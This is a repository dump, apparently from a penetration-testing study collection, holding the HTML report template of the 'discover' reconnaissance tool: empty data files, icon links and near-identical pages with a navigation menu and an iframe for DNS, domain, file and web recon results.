--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/data/records.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/data/squatting.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/data/subdomains.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/data/traceroute.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/data/txt.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/data/waf.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/data/whatweb.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/data/whois-domain.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/data/whois-ip.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/data/xls.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/data/zonetransfer.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/images/icons/blue.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/ENUMERATION/discover-master/report/images/icons/blue.png


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/images/icons/green.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/ENUMERATION/discover-master/report/images/icons/green.png


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/images/icons/red.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/ENUMERATION/discover-master/report/images/icons/red.png


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/images/icons/yellow.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/ENUMERATION/discover-master/report/images/icons/yellow.png


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/images/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/ENUMERATION/discover-master/report/images/logo.png


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/index.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li class="current"><a href="index.htm" onclick="populateDefault()">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 
26 | 			<li><a href="#">DNS</a>
27 | 			<ul>
28 | 			     <li><a href="pages/black-listed.htm">Black Listed</a></li>
29 | 			     <li><a href="pages/config.htm">Config</a></li>
30 | 			     <li><a href="pages/records.htm">Records</a></li>
31 | 			     <li><a href="pages/subdomains.htm">Subdomains</a></li>
32 | 			     <li><a href="pages/zonetransfer.htm">Zone Transfer</a></li>
33 | 			</ul>         
34 | 			</li>
35 | 
36 | 			<li><a href="#">Domain</a>
37 | 			<ul>
38 | 			     <li><a href="pages/hosts.htm">Hosts</a></li>
39 |                     <li><a href="pages/netcraft.htm">Netcraft</a></li>
40 | 			     <li><a href="pages/squatting.htm">Squatting</a></li>
41 | 			     <li><a href="pages/traceroute.htm">Traceroute</a></li>
42 | 			     <li><a href="pages/whois-domain.htm">Whois Domain</a></li>
43 | 			     <li><a href="pages/whois-ip.htm">Whois IP</a></li>
44 | 			</ul>         
45 | 			</li>
46 | 
47 | 			<li><a href="#">Files</a>
48 | 			<ul>
49 | 			     <li><a href="pages/xls.htm">Excel</a></li>
50 | 			     <li><a href="pages/pdf.htm">PDF</a></li>
51 | 			     <li><a href="pages/ppt.htm">PowerPoint</a></li>
52 | 			     <li><a href="pages/txt.htm">Text</a></li>
53 | 			     <li><a href="pages/doc.htm">Word</a></li>
54 | 			</ul>         
55 | 			</li>
56 | 
57 | 			<li><a href="#">Reports</a>
58 | 			<ul>
59 | 			     <li><a href="pages/active-recon.htm">Active Recon</a></li>
60 | 			     <li><a href="pages/passive-recon.htm">Passive Recon</a></li>
61 | 			</ul>         
62 | 			</li>
63 | 
64 | 			<li><a href="#">Web</a>
65 | 			<ul>
66 | 			     <li><a href="pages/loadbalancing.htm">Loadbalancing</a></li>
67 | 			     <li><a href="pages/waf.htm">Web App FW</a></li>
68 | 			     <li><a href="pages/whatweb.htm">Whatweb</a></li>
69 | 			</ul>         
70 | 			</li>
71 | 		</ul>
72 | 	</div>
73 | </div>
74 | 
75 | <div class="wrapper">
76 | 	<div class="container_12">
77 | 		<div class="main-content">
78 | 			<h2 class="page-header"><center><small class="lg-text">Easily browse <i>passive</i> and <i>active</i> recon for <a href="http://REPLACEDOMAIN" target="_blank">REPLACEDOMAIN</a>.</small></center></h2>
79 |                <br>
80 |                <br>
81 |                <br>
82 |                <br>
83 |                <center><img src="images/logo.png"></center>
84 |                <br>
85 |                <br>
86 | 		</div>
87 | 	</div>
88 | </div>
89 | 
90 | </body>
91 | 
92 | </html>
93 | 
94 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/pages/active-recon.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li class="current"><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li class="current"><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">Reports: <small class="lg-text">Active Recon</small></h2>
80 | 			<iframe src="../data/active-recon.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/pages/black-listed.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li class="current"><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li class="current"><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">DNS: <small class="lg-text">Black Listed</small></h2>
80 | 			<iframe src="../data/black-listed.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/pages/config.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li class="current"><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li class="current"><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 		          <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">DNS: <small class="lg-text">Config</small></h2>
80 | 		</div>
81 | 	</div>
82 | </div>
83 | 
84 | <center><iframe src="../data/config.htm" width="80%"></iframe></center>
85 | 
86 | </body>
87 | 
88 | </html>
89 | 
90 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/pages/doc.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li class="current"><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li class="current"><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">Files: <small class="lg-text">Word</small></h2>
80 | 			<iframe src="../data/doc.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/pages/emails.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li class="current"><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li class="current"><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">Contacts: <small class="lg-text">Emails</small></h2>
80 | 			<iframe src="../data/emails.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/pages/hosts.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li class="current"><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li class="current"><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">Domain: <small class="lg-text">Hosts</small></h2>
80 | 			<iframe src="../data/hosts.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/pages/loadbalancing.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li class="current"><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li class="current"><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
